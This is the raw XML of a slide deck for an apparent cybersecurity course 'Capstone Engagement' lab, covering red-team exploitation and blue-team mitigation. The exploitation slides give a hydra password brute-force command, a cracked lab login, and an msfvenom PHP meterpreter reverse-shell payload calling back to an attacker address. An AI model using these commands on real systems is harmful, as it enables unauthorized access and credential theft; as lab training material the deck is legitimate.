              <a:pPr marL="91440" indent="-9144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The exploit provided us with the correct username (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sym typeface="Roboto"/>
                </a:rPr>
                <a:t>ashton</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>) and password (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sym typeface="Roboto"/>
                </a:rPr>
                <a:t>leopoldo</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>).</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr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endParaRPr lang="en-US" sz="1400" b="1" dirty="0"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8697A8-D8E9-DC4F-AEC8-5A7369827670}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957904" y="5486401"/>
            <a:ext cx="289246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Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hydra -l 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ashton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 -P /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usr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/share/wordlists/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rockyou.txt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 -s 80 -f -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vV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 192.168.1.105 http-get /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company_folders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/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secret_folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"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22" name="Picture 2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6B25F3D-F6D3-7445-8578-9A34BD9D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477" y="3667548"/>
            <a:ext cx="3108960" cy="22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0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F27B-83D5-B14C-8BDA-F5A3A51C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Exploitation: Remote Code Execution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E5AAD-F534-D942-B8D1-FC817A65201B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="445406" y="1690617"/>
            <a:ext cx="3650372" cy="4802178"/>
            <a:chOff x="571107" y="1690642"/>
            <a:chExt cx="3650372" cy="4802178"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Google Shape;1091;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08BAE440-06F6-9545-892F-79E17C477771}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="838199" y="2283313"/>
              <a:ext cx="3383280" cy="4209507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Tools &amp; Processes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To create a php reverse-shell payload, we used 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msfvenom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, a tool provided by the Metasploit framework.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Command used to create the payload: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This provided us with the file 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shell.php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, which was uploaded to the server as described in the next section.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By using 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msfconsole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and the module </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0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multi/handler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, we were able to set up a handler for the reverse-shell.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Accessing the uploaded file via a web browser kicks off the process and grants us access to the server.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" name="Google Shape;1093;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1868A20-78A9-494C-9B60-69EFB08C757D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="571107" y="1690642"/>
              <a:ext cx="533372" cy="533480"/>
              <a:chOff x="457200" y="1378813"/>
              <a:chExt cx="695400" cy="695450"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="Google Shape;1094;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A53F5D79-FB83-0F49-8C8A-628236F59EB7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01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3" name="Google Shape;1095;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{834B646D-9799-CA4C-91F4-4D3DACD87515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EAC177-A1D8-C242-8030-B56BD2584F50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4270813" y="1690617"/>
            <a:ext cx="3650374" cy="4802128"/>
            <a:chOff x="4391833" y="1690692"/>
            <a:chExt cx="3650374" cy="4802128"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Google Shape;1096;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14F4CE29-C619-1245-8261-292EB289E784}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4391833" y="1690692"/>
              <a:ext cx="533372" cy="533480"/>
              <a:chOff x="457200" y="1378813"/>
              <a:chExt cx="695400" cy="695450"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="Google Shape;1097;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{153B450B-873E-F742-9C2D-46668434BC86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02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8" name="Google Shape;1098;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABD3491C-CB11-654A-A257-9DE92BC9D597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6" name="Google Shape;1099;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1171D3F1-D0FE-B64A-8B4C-5B697C2CAB18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4658927" y="2283364"/>
              <a:ext cx="3383280" cy="420945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400" b="1" dirty="0">
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Achievements</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="91440" lvl="0" indent="-91440">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc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 exploit provided us with a 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meterpreter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reverse-shell on the server, which can be used in a variety of ways.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="91440" lvl="0" indent="-91440">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc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From the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                  <a:latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                  <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>meterpreter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shell, one can drop into a normal user shell on the system.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D5FF65-3EFF-A949-A358-419E55D2BDDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8096223" y="1690667"/>
            <a:ext cx="3650374" cy="4802078"/>
            <a:chOff x="8200117" y="1690642"/>
            <a:chExt cx="3650374" cy="4802078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Google Shape;1101;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D452AB2-807D-B242-B75F-3D0308673A48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8200117" y="1690642"/>
              <a:ext cx="533372" cy="533480"/>
              <a:chOff x="457200" y="1378813"/>
              <a:chExt cx="695400" cy="695450"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="Google Shape;1102;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C641363-E70B-134B-AB8B-7CB64560E939}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="457200" y="1378813"/>
                <a:ext cx="695400" cy="62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dirty="0"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03</a:t>
                </a:r>
                <a:endParaRPr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3" name="Google Shape;1103;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{606B5E1B-D648-7643-A103-387A52CEFDC0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="634726" y="1885638"/>
                <a:ext cx="340325" cy="188625"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartExtra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" name="Google Shape;1104;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CC651C5-A69D-DA40-B4A6-75CEFCDD2013}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8467211" y="2283313"/>
              <a:ext cx="3383280" cy="4209407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US" sz="1400" b="1" dirty="0">
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Results</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="91440" indent="-91440"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Using the handler to gain reverse-shell access:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="dk1"/>
                </a:buClr>
                <a:buSzPts val="1100"/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"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11C198E-3BD9-2145-8FCC-F541ED6066A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957904" y="3680131"/>
            <a:ext cx="289246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msfvenom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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-p php/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meterpreter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/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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> LHOST=192.168.1.90 LPORT=4444 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-f raw -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"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9E178E1-EA44-434C-A7F8-9EA9D750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477" y="3429000"/>
            <a:ext cx="3108960" cy="19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FF2800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FF2800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Techie-Ligh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2101</Words>
  <Application>Microsoft Macintosh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Roboto</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Mono</vt:lpstr>
      <vt:lpstr>Roboto Regular</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>1_Custom Design</vt:lpstr>
      <vt:lpstr>Custom Design</vt:lpstr>
      <vt:lpstr>Capstone Engagement</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team</vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: Brute Force Vulnerability</vt:lpstr>
      <vt:lpstr>Exploitation: Remote Code Execution</vt:lpstr>
      <vt:lpstr>Exploitation: Unauthorized File Upload</vt:lpstr>
      <vt:lpstr>Blue Team</vt:lpstr>
      <vt:lpstr>Analysis</vt:lpstr>
      <vt:lpstr>Analysis</vt:lpstr>
      <vt:lpstr>Analysis</vt:lpstr>
      <vt:lpstr>Analysis</vt:lpstr>
      <vt:lpstr>Hardening</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>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 Morgan Lieberthal</dc:creator>
  <cp:lastModifiedBy>J. Morgan Lieberthal</cp:lastModifiedBy>
  <cp:revision>158</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-05T14:48:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-08T06:31:57Z</dcterms:modified>
</cp:coreProperties>
</file>